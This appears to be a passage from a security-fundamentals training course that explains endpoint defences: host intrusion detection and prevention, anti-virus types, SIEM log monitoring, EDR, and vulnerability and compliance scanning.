Endpoint Security

Host Intrusion Detection

Host intrusion detection systems, also known as HIDS, is software installed on an endpoint that allows for the detection of suspicious or malicious activity using rules which are checked against activity to see if it matches any known malicious patterns. This security control will generate alerts (hence the name host intrusion "detection" system) so that human analysts can investigate further from a HIDS solution interface. Alternatively, alerts can also be pushed to a SIEM platform (covered below under the Security Monitoring heading) to inform analysts to investigate.

Host Intrusion Prevention

Host intrusion prevention systems, also known as HIPS, is software installed on an endpoint that works similarly to HIDS but is able to take autonomous actions to defend systems once the malicious activity has been detected instead of just alerting human analysts (hence the name host intrusion "prevention" system). Rules are written to search for specific patterns of activity, but with HIPS these rules contain actions, so the software knows what to do when unusual activity is detected. This can include terminating connections to websites or IP addresses, deleting malicious files, or generating an alert.

Anti-Virus Solutions

Anti-virus software, commonly abbreviated to "AV" should be deployed on all endpoints, such as desktops, laptops, and servers. This is a fundamental security control that works to detect and remove known malware that is present on the system. There are two types of anti-virus solutions:

• Signature-based: The AV solution will use signatures which are specific patterns of activity to identify previously documented malware, either removing the file, generating an alert, or quarantining the malware. Unfortunately, if the AV vendor doesn't have the signature of a certain type of malware, it will not be detected by this type of anti-virus and can potentially execute successfully.

• Behavior-based: This type of unconventional AV works to identify suspicious behavior by creating a baseline of "normal" activity and working to identify any deviations or anomalies that don't fit the baseline, as these could indicate suspicious or malicious activity.

Log Monitoring

Endpoints can be configured to send logs to a centralized location, a SIEM platform, where this data is aggregated, normalized, and matched against a number of rules designed to detect and flag suspicious or unusual activity so it can be investigated by security analysts. If an endpoint is sending logs, whether it's a desktop, laptop, or server, and it starts acting unusually the SIEM should pick this up and generate an alert to signal a human investigation. We can use Syslog to achieve this level of logging and monitoring by combining it with a SIEM platform. We'll cover this in a lot more detail during the SIEM domain.

Endpoint Detection and Response

EDR agents are pieces of software that sit silently on endpoints and provide logging, monitoring, and reactive capabilities. Similar to HIDS and HIPS, EDR agents will report activity back to a platform similar to a SIEM, where analysts can log in and investigate alerts generated by the EDR solution. These solutions will typically allow analysts to conduct investigations straight from the platform and see exactly what processes are running on monitored systems, and conduct in-depth investigations to analyze the suspicious activity. EDR platforms can also be utilized to monitor for insider threats by closely watching exactly what certain users are doing, combining this with other forensic-grade tools can retrieve specific information from a system such as sites visited, messages sent, and programs run.

Vulnerability Scanning

Routine vulnerability scans should be conducted against endpoints to detect misconfigurations, security flaws, and vulnerabilities that could be exploited by an attacker to gain access to a system, execute malicious code, or cause a denial of service. These scans can be conducted either internally or externally.

• External scans - typically conducted by scanners in the cloud can provide an organization with an "attackers view" by seeing what systems and weaknesses are discovered on internet-facing systems with security controls and firewalls working.

• Internal scan - give a more comprehensive view of the security posture of internal systems, but does not necessarily reflect what an attacker would see, unless they gained access inside the network and started vulnerability scanning from within.

Scans can either be non-credentialed or credentialed, meaning that the scanner is able to log in to systems with high privileges and collect a lot more information about configurations, program versions, and more. However, a non-credentialed scan can give a better view of what an attacker would see, and can help to prioritize what vulnerabilities have a higher likelihood of being exploited, so they can be remediated first.

Once a vulnerability scan is complete, the results should be analyzed and sent to appropriate system owners so they can be addressed.

Compliance Scanning

Some compliance frameworks require endpoints to meet a minimum standard of security, and vulnerability scanners will often have profiles or pre-set setting configurations to look specifically for details that the compliance framework covers, allowing defenders to see if any systems do not meet the requirements. We will cover compliance in more detail in the next section of the Security Fundamentals domain.